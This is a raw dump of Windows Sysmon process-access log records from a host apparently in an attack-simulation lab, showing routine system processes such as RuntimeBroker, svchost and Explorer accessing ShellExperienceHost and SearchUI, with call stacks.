13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405716C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000012050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.195{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000012043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.179{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000012042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.179{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.164{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
